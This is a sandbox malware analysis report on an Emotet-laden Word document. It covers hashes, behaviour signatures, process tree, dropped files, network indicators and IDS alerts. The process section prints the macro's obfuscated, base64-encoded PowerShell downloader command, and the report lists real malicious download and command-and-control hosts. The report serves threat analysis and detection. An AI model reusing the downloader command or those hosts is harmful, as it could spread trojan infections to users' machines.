analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
download:

2018-11

Full analysis: https://app.any.run/tasks/a2fff28b-6db2-45c6-90f0-0fc88cd92592
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: November 08, 2018, 22:29:04
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
trojan
loader
emotet
feodo
maldoc-4
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Jayden-PC, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Nov 8 16:04:00 2018, Last Saved Time/Date: Thu Nov 8 16:04:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0
MD5:

580A3B09DF7A9D015E1015E2D4CB06AE

SHA1:

8069E779DF8A46B21D59C14950DCCF208AA628F3

SHA256:

E57F9B7CE52EDBA1EC74C19714E2A9BAAEEF40BCA090B304ED2BB3704CA285C7

SSDEEP:

768:DXirRkVucRFoqkp59YBvLdTv9ReVi4eFov5UHRFBt+1o94GY3erHihX51CLW:j4Rkocn1kp59gxBK85fBt+a9tFTiLI

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 673.exe (PID: 3624)
      • 673.exe (PID: 2316)
      • lpiograd.exe (PID: 3948)
      • lpiograd.exe (PID: 3532)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3708)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 3708)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2072)
    • Emotet process was detected

      • lpiograd.exe (PID: 3948)
    • EMOTET was detected

      • lpiograd.exe (PID: 3532)
    • Changes the autorun value in the registry

      • lpiograd.exe (PID: 3532)
    • Connects to CnC server

      • lpiograd.exe (PID: 3532)
  • SUSPICIOUS

    • Executes PowerShell scripts

      • CMD.exe (PID: 2540)
    • Creates files in the user directory

      • powershell.exe (PID: 2072)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2072)
      • 673.exe (PID: 2316)
    • Starts itself from another location

      • 673.exe (PID: 2316)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3708)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3708)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 14
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 13
Words: 2
Pages: 1
ModifyDate: 2018:11:08 16:04:00
CreateDate: 2018:11:08 16:04:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: Jayden-PC
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
7
Malicious processes
7
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs cmd.exe no specs powershell.exe 673.exe no specs 673.exe #EMOTET lpiograd.exe no specs #EMOTET lpiograd.exe

Process information

PID
CMD
Path
Indicators
Parent process
3708"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\2018-11.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2540CMD c:\wINDOWs\SySteM32\cMd.eXE /c"seT oDB= ( NeW-ObjECT IO.COMPresSioN.DeFLatEStREAm( [Io.MemoRysTreAm] [cONvErt]::fROMbASE64sTRIng( 'NZDLbsIwEEV/JYtIBlHsPmipiCLxLEJCbLpg042dTBI3xnZtJyag/HsTWrYz554Z3VBtWSzBjxX7hsQFB3D4CGwlOEgXhVb7GBXO6RkhBQidgi0zfgaDE3Ui5akujzs9/wey5sJLiivJtcK2JCl1lOSgCM07GfG0fiY1N5Ul++N2YlN3DwqwTFVJAdb0Z29uoXLLHZCnxiWXbCNWhzvtvceQMW4YFzm3tKF/35iFFz96eseYMjnYsTa8M5qKrOlEm8fXZfOO8KcW3A3QHA2jkKcyiAP0Nn1BUbi/LOMQZD1zcNIj9IVG/X6EMJwBRZkyQJNiEC42NuAy6OsZXp1prmFXI14rL4Wi6QcXcGMegl44jHayViWMd530NolY5ymjNqEuKa5t+ws=' ) , [SYstEm.Io.coMpResSioN.cOMPrEsSIONmOde]::deCOMprEsS) ^| % { NeW-ObjECT sYsTEM.iO.StReaMReaDeR( $_ ,[Text.EnCoDINg]::aSCiI )} ^|%{ $_.rEadtOEnD( ) })^|^&((get-VariABlE '*MDR*').nAME[3,11,2]-join'')&& POwErSheLL Set-ITem (\"VAriAB\" +\"Le:zl\" + \"AH\" + \"3g\") ( [tYPE]( \"{0}{3}{1}{2}\"-F'En','RoN','menT','vi' ) ) ;( ^&( \"{0}{1}\" -f'D','IR') (\"{3}{1}{2}{4}{0}\"-f 'oncONtext','R','i','va','ablE:exECuti' )).\"vAL`UE\".\"InV`OKE`COMMA`Nd\".(\"{2}{0}{1}\"-f 'voKEsC','RIPT','IN' ).Invoke( ( ${z`lAh3g}::( \"{5}{0}{4}{3}{6}{2}{1}\" -f 'eT','LE','tVARIAb','e','eNvIrOnm','g','N' ).Invoke('oDB',(\"{1}{2}{0}\" -f 'Ss','Pro','CE' ))))" C:\Windows\system32\CMD.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2072POwErSheLL Set-ITem (\"VAriAB\" +\"Le:zl\" + \"AH\" + \"3g\") ( [tYPE]( \"{0}{3}{1}{2}\"-F'En','RoN','menT','vi' ) ) ;( &( \"{0}{1}\" -f'D','IR') (\"{3}{1}{2}{4}{0}\"-f 'oncONtext','R','i','va','ablE:exECuti' )).\"vAL`UE\".\"InV`OKE`COMMA`Nd\".(\"{2}{0}{1}\"-f 'voKEsC','RIPT','IN' ).Invoke( ( ${z`lAh3g}::( \"{5}{0}{4}{3}{6}{2}{1}\" -f 'eT','LE','tVARIAb','e','eNvIrOnm','g','N' ).Invoke('oDB',(\"{1}{2}{0}\" -f 'Ss','Pro','CE' ))))C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CMD.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3624"C:\Users\admin\AppData\Local\Temp\673.exe" C:\Users\admin\AppData\Local\Temp\673.exepowershell.exe
User:
admin
Company:
AbanSoft / Sun Microsystems, Inc.
Integrity Level:
MEDIUM
Description:
Window I Stub
Exit code:
0
Version:
1, 4, 2, 50
2316"C:\Users\admin\AppData\Local\Temp\673.exe"C:\Users\admin\AppData\Local\Temp\673.exe
673.exe
User:
admin
Company:
AbanSoft / Sun Microsystems, Inc.
Integrity Level:
MEDIUM
Description:
Window I Stub
Exit code:
0
Version:
1, 4, 2, 50
3948"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe
673.exe
User:
admin
Company:
AbanSoft / Sun Microsystems, Inc.
Integrity Level:
MEDIUM
Description:
Window I Stub
Exit code:
0
Version:
1, 4, 2, 50
3532"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe
lpiograd.exe
User:
admin
Company:
AbanSoft / Sun Microsystems, Inc.
Integrity Level:
MEDIUM
Description:
Window I Stub
Version:
1, 4, 2, 50
Total events
1 662
Read events
1 248
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
3708WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA6DA.tmp.cvr
MD5:
SHA256:
2072powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JZGQQX7KTQGSM6LSQ1UQ.temp
MD5:
SHA256:
2072powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:3C6A7AAE234382390B6B52F47ECA1BAA
SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2
2072powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF5db1f6.TMPbinary
MD5:3C6A7AAE234382390B6B52F47ECA1BAA
SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2
3708WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$018-11.docpgc
MD5:89EBE7EDC538ECEAC4C51A2C898D0672
SHA256:DF5AD50648DFD19BB49B8B74E424554CAF69F99F0ED662A8F9D8BE8C6B970169
3708WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:F12123BE3FC217E2B306FA7D3C1EF718
SHA256:3C767FE8FEA3E2CCF71ADDB57BE518569265124015C279DC07A0A438B8E20F32
2072powershell.exeC:\Users\admin\AppData\Local\Temp\673.exeexecutable
MD5:A75D52EECA1B1EBCF1B81F2508512BD2
SHA256:F8000AAF823F1327F38052E8914B863794A44B8B2991667BD2066BC5E7A03F22
2316673.exeC:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exeexecutable
MD5:A75D52EECA1B1EBCF1B81F2508512BD2
SHA256:F8000AAF823F1327F38052E8914B863794A44B8B2991667BD2066BC5E7A03F22
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2072
powershell.exe
GET
200
185.10.73.233:80
http://helpdeskfixer.com/kmvkWIp/
IR
executable
148 Kb
malicious
2072
powershell.exe
GET
301
185.10.73.233:80
http://helpdeskfixer.com/kmvkWIp
IR
html
241 b
malicious
3532
lpiograd.exe
GET
200
187.163.174.149:8080
http://187.163.174.149:8080/
MX
binary
132 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2072
powershell.exe
185.10.73.233:80
helpdeskfixer.com
Roshangar Rayaneh Tehran Co. Ltd.
IR
malicious
3532
lpiograd.exe
187.163.174.149:8080
Axtel, S.A.B. de C.V.
MX
malicious

DNS requests

Domain
IP
Reputation
helpdeskfixer.com
  • 185.10.73.233
malicious

Threats

PID
Process
Class
Message
2072
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Generic Trojan Emotet downloader
2072
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2072
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2072
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
3532
lpiograd.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
1 ETPRO signatures available at the full report
No debug info